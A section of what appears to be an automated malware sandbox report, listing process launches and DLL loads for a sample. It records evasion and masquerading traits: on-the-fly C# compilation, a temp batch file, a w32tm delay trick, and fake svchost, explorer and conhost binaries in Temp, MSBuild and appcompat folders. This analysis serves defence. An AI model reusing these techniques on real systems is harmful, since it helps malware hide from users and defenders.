                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: msvcp140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: version.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\blockhostnet\msinto.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rasman.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rtutils.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: edputil.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: winmm.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: winmmbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: mmdevapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: devobj.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ksuser.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: avrt.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: dwrite.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: audioses.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: powrprof.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: umpdc.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: msacm32.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: midimap.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe | Section loaded: dpapi.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: mscoree.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: apphelp.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: version.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: uxtheme.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: windows.storage.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: wldp.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: profapi.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: cryptsp.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: rsaenh.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: cryptbase.dll
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | Section loaded: sspicli.dll
